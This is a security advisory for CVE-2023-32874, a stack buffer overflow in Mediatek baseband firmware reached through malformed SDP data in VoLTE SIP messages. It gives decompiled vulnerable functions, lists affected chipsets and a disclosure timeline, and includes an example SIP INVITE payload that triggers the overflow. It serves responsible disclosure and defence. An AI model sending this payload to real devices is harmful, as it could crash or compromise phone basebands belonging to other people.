An attacker sending a malformed SIP message over VoLTE to a device with a Mediatek baseband can trigger the vulnerability described here.
The impact is stack buffer overflow in the baseband, triggered by malformed SDP data in VoLTE message such as SIP INVITE or MESSAGE request.
The vulnerability described in this advisory affected a wide range of Mediatek devices. The January 2024 issue of the Mediatek Security Bulletin contains this vulnerability as CVE-2023-32874.
## Vulnerability Details
When a SIP message contains SDP data, first the `cc_call_unpack_sdpmsg` routine is invoked to unpack the message bytes into an internal representation ( `sdp_message_struct`).
Later the codec information is extracted from this internal representation by calling several codec extracting functions.
This includes `acct_extract_codec_info_from_sdp`, `ussd_extract_codec_info_from_sdp` and `sip_set_sip_info_ind_sdp_para`.
All three functions contain a stack buffer overflow vulnerability: the stack buffer that holds the generated
codec info string is limited in length, but the codec info can have an arbitrary length.
This same vulnerability is present in `acct_extract_codec_info_from_sdp`, `ussd_extract_codec_info_from_sdp` and `sip_set_sip_info_ind_sdp_para`, because these routines essentially implement the exact same functionality.
“`
void sip_set_sip_info_ind_sdp_para( ims_dbg_sip_info_ind_struct *dbg_sip_info, sdp_message_struct *sdp_msg ) { size_t buf_len; undefined4 uVar1; sdp_media_struct *m; sdp_media_attr_struct *rtpmap_entry; char tmp [32]; char buf [256]; __wrap_memset(buf,0,0×100); m = sdp_msg->m; dbg_sip_info->session_as = (kal_uint16)(sdp_msg->b).value; // [0] SDP media descriptions are iterated for (; m != NULL; m = m->next) { if ((m->is_present != KAL_FALSE) && (m->port != 0)) { if (m->media == 0) { dbg_sip_info->audio_as = (kal_uint16)(m->b).value; dbg_sip_info->audio_port = (kal_uint16)m->port; } else if (m->media == 1) { dbg_sip_info->video_as = (kal_uint16)(m->b).value; dbg_sip_info->video_port = (kal_uint16)m->port; } // [1] rtpmap attributes are iterated for each media description for (rtpmap_entry = m->rtpmap_list; rtpmap_entry != NULL; rtpmap_entry = rtpmap_entry->p_next) { __wrap_memset(tmp,0,0×20); uVar1 = sip_get_codec_enum((int)(char)rtpmap_entry->encoding_name, rtpmap_entry->clock_rate); voip_snprintf(tmp,0x20,”%d;%d,”,rtpmap_entry->pt,uVar1); // [2] the codec id and payload type is added to the stack buffer strcat(buf,tmp); } } } if (buf[0] != ”) { buf_len = strlen(buf); tmp[buf_len + 0x1f] = ”; voip_strncpy(dbg_sip_info->codec_info,buf,0x100); } return; }
“`
“`
void acct_extract_codec_info_from_sdp(sdp_msg_t *sdp_msg,char *out) { size_t sVar1; undefined4 uVar2; sdp_media_rtmap_t *rtpmap; sdp_msg_media_t *media; char line [32]; char buf [256]; __wrap_memset(buf,0,0×100); if (sdp_msg != (sdp_msg_t *)0x0) { // [0] SDP media descriptions are iterated for (media = sdp_msg->m_media_p; media != (sdp_msg_media_t *)0x0; media = media->next) { // [1] rtpmap attributes are iterated for each media description for (rtpmap = media->a_rtpmap_list; rtpmap != (sdp_media_rtmap_t *)0x0; rtpmap = rtpmap->next) { __wrap_memset(line,0,0×20); uVar2 = acct_get_icd_codec_enum ((int)(char)rtpmap->encoding_type,*(int *)&rtpmap->clock_rate_idx); voip_snprintf(line,0x20,”%d;%d,”,rtpmap->payload_type,uVar2); // [2] the codec id and payload type is added to the stack buffer strcat(buf,line); } } if (buf[0] != ”) { buf[strlen(buf)] = ”; } } voip_strncpy(out,buf,0x100); return; }
“`
The SDP content of a SIP Invite message can contain multiple media descriptions, each of which
can contain 31 rtpmap attributes.
The number of media descriptions is not limited.
The vulnerable code iterates over the media descriptions [0] and rtpmap attributes [1], retrieves the codec enum value for each attribute and prints it into a temporary buffer.
The content of the temporary buffer is concatenated to a 256 bytes long stack buffer using `strcat`, without any bounds checking.
Note that on some firmware versions, the `acct_extract_codec_info_from_sdp` and `ussd_extract_codec_info_from_sdp` function implementations call the `sdp_merge_comma_separated_strings` function to concatenate buffers instead of the vulnerable `strcat`.
This function uses a heap buffer to hold the resulting string and correctly extends it whenever needed.
However, `sip_set_sip_info_ind_sdp_para` remains vulnerable and is reached via the `_sip_ua_dbg_sip_info_ind` function, which is a call path that is reached for all SIP messages with an SDP body.
## Example Payload
“`
INVITE sip:192.168.101.3:50021;transport=tcp SIP/2.0 Content-Type: application/sdp Content-Length: 2953 v=0 o=rue 3259 3259 IN IP4 172.30.0.16 s=- c=IN IP4 172.30.0.16 b=AS:41 b=RR:1537 b=RS:512 t=0 0 m=audio 49210 RTP/AVP 107 106 105 104 101 102 b=AS:41 b=RR:1537 b=RS:512 a=maxptime:240 a=curr:qos local none a=curr:qos remote none a=des:qos mandatory local sendrecv a=des:qos optional remote sendrecv a=rtpmap:107 AMR-WB/16000/1 a=fmtp:107 mode-change-capability=2;max-red=0 a=rtpmap:106 AMR-WB/16000/1 a=fmtp:106 octet-align=1;mode-change-capability=2;max-red=0 a=rtpmap:105 AMR/8000/1 a=fmtp:105 mode-change-capability=2;max-red=0 a=rtpmap:104 AMR/8000/1 a=fmtp:104 octet-align=1;mode-change-capability=2;max-red=0 a=rtpmap:101 telephone-event/16000 a=fmtp:101 0-15 a=rtpmap:102 telephone-event/8000 a=fmtp:102 0-15 a=sendrecv a=rtcp:49211 a=ptime:20 m=audio 0 RTP/AVP 109 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 a=rtpmap:109 telephone-event/8000 m=audio 1 RTP/AVP 110 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 a=rtpmap:110 telephone-event/8000 m=audio 1 RTP/AVP 111 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000 a=rtpmap:111 telephone-event/8000
“`
# Affected Devices
MT2735, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6789, MT6813, MT6833, MT6833P, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6877T, MT6878, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895T, MT6896, MT6897, MT6980, MT6980D, MT6983T, MT6983W, MT6983Z, MT6985, MT6985T, MT6989, MT6990
# Timeline
– 2023.07.28. Bug reported to Mediatek PSIRT
– 2023.08.07. Mediatek confirms vulnerability
– 2023.11.06. Mediatek confirms CVE
– 2024.01.02. Mediatek releases security bulletin
– 2025.06.26. Vulnerability publicly disclosed at Troopers ‘25
– 2025.10.01. Advisory release